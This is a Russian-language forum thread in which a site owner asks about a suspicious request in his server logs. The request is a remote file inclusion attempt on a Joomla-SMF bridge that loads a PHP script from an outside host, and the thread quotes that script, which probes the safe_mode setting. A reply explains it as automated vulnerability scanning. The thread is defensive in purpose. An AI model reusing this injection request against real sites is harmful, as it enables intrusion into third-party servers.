Атака?

Автор ForeverYoung, 28 июня 2007, 08:06:49

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Печать
Вниз Страницы1
Действия пользователя

ForeverYoung

28 июня 2007, 08:06:49
Нахожу в логах сервера несколько запросов такого вида:
Код Выделить
70.84.189.194 ___mysite.ru - [28/Jun/2007:05:35:14 +0400] "GET /component/option,com_smf/Itemid,10/topic,128.0//components/com_smf/smf.php?mosConfig_absolute_path=http://www.dezzign.ru/bht.txt? HTTP/1.1" 200 29292 "-" "libwww-perl/5.805"

Смотрю содержимое www.dezzign.ru/bht.txt:
Код Выделить
<?php
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode "memex_off"; }
else { $SafeMode "memex_on"; } 
echo $SafeMode;
?>

Т.е. насколько я могу судить, пока ничего опасного: и запрос неправильный, и код всего-лишь должен выводить состояние Safe Mode. Но ведь просто так никто не будет интересоваться состоянием Safe Mode?
Чего ждать, к чему готовиться? А главное: как готовиться, что проверить у себя для собственного спокойствия?

ForeverYoung

#1
28 июня 2007, 10:05:45
Mavn, спасибо за новый раздел. Имхо давно пора. :)

TL

#2
06 июля 2007, 00:31:57
Цитата: ForeverYoung от 28 июня 2007, 08:06:49
Нахожу в логах сервера несколько запросов такого вида:
Код Выделить
70.84.189.194 ___mysite.ru - [28/Jun/2007:05:35:14 +0400] "GET /component/option,com_smf/Itemid,10/topic,128.0//components/com_smf/smf.php?mosConfig_absolute_path=http://www.dezzign.ru/bht.txt? HTTP/1.1" 200 29292 "-" "libwww-perl/5.805"
Робот проверял, не оказался ли ты неудачником с дырявым мостом Joomla-SMF. Если бы он таким запросом считал бы с тебя ответ скрипта, который пытался внедрить, то запомнил бы твой сайт как потенциально уязвимый; и при случае владелец робота впарил бы тебе какую-нибудь гадость на сайт :)
Печать
Вверх Страницы1
Действия пользователя